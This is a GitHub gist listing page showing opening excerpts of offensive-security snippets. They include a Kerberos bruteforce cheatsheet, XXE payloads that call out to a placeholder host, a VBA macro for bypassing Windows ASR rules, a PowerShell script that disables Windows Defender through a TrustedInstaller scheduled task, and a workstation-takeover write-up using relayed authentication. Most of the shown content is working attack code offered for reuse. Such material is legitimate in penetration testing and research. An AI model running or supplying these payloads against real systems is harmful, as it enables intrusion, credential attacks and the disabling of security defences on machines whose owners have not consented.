Skip to content

Instantly share code, notes, and snippets.

View S3cur3Th1sSh1t's full-sized avatar

S3cur3Th1sSh1t

3.1k followers · 171 following
View GitHub Profile
@UniIsland
UniIsland / SimpleHTTPServerWithUpload.py
Created August 14, 2012 04:01
Simple Python Http Server with Upload
#!/usr/bin/env python
"""Simple HTTP Server With Upload.
This module builds on BaseHTTPServer by implementing the standard GET
and HEAD requests in a fairly straightforward manner.
"""
@TarlogicSecurity
TarlogicSecurity / kerberos_attacks_cheatsheet.md
Created May 14, 2019 13:33
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@LuemmelSec
LuemmelSec / GBC.ps1
Created December 9, 2022 07:43
Give Back Control over Windows functions script
$elevated = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
function Show-Menu {
Clear-Host
Write-Host "======================================================"
Write-Host "================ Give Back Control ================"
Write-Host "======================================================"
if($elevated -eq $true){
Write-Host "Local Admin: " -ForegroundColor white -NoNewline; Write-Host $elevated -ForegroundColor Green
Write-Host "We have superpowers. Ready to continue."
@seajaysec
seajaysec / customqueries.json
Last active May 1, 2024 15:59
bloodhound custom queries
{
"queries": [{
"name": "List all owned users",
"queryList": [{
"final": true,
"query": "MATCH (m:User) WHERE m.owned=TRUE RETURN m"
}]
},
{
"name": "List all owned computers",
@staaldraad
staaldraad / XXE_payloads
Last active April 29, 2024 14:27
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@HarmJ0y
HarmJ0y / PowerView-3.0-tricks.ps1
Last active April 29, 2024 13:06
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
@infosecn1nja
infosecn1nja / ASR Rules Bypass.vba
Last active April 25, 2024 21:00
ASR rules bypass creating child processes
' ASR rules bypass creating child processes
' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction
' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office
' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule
Sub ASR_blocked()
Dim WSHShell As Object
Set WSHShell = CreateObject("Wscript.Shell")
WSHShell.Run "cmd.exe"
End Sub
@gladiatx0r
gladiatx0r / Workstation-Takeover.md
Last active April 25, 2024 13:23
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure

Overview

In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

@tyranid
tyranid / doh.ps1
Created May 4, 2020 15:17
Something or other.
$cmdline = '/C sc.exe config windefend start= disabled && sc.exe sdset windefend D:(D;;GA;;;WD)(D;;GA;;;OW)'
$a = New-ScheduledTaskAction -Execute "cmd.exe" -Argument $cmdline
Register-ScheduledTask -TaskName 'TestTask' -Action $a
$svc = New-Object -ComObject 'Schedule.Service'
$svc.Connect()
$user = 'NT SERVICE\TrustedInstaller'
$folder = $svc.GetFolder('\')
@namazso
namazso / CMakeLists.txt
Created March 26, 2024 10:22
Universal function proxy
cmake_minimum_required(VERSION 3.28)
project(untitled C ASM)
set(CMAKE_CXX_STANDARD 17)
set(CMAKE_ASM_COMPILE_OPTIONS_MSVC_RUNTIME_LIBRARY_MultiThreaded "")
set(CMAKE_ASM_COMPILE_OPTIONS_MSVC_RUNTIME_LIBRARY_MultiThreadedDLL "")
set(CMAKE_ASM_COMPILE_OPTIONS_MSVC_RUNTIME_LIBRARY_MultiThreadedDebug "")
set(CMAKE_ASM_COMPILE_OPTIONS_MSVC_RUNTIME_LIBRARY_MultiThreadedDebugDLL "")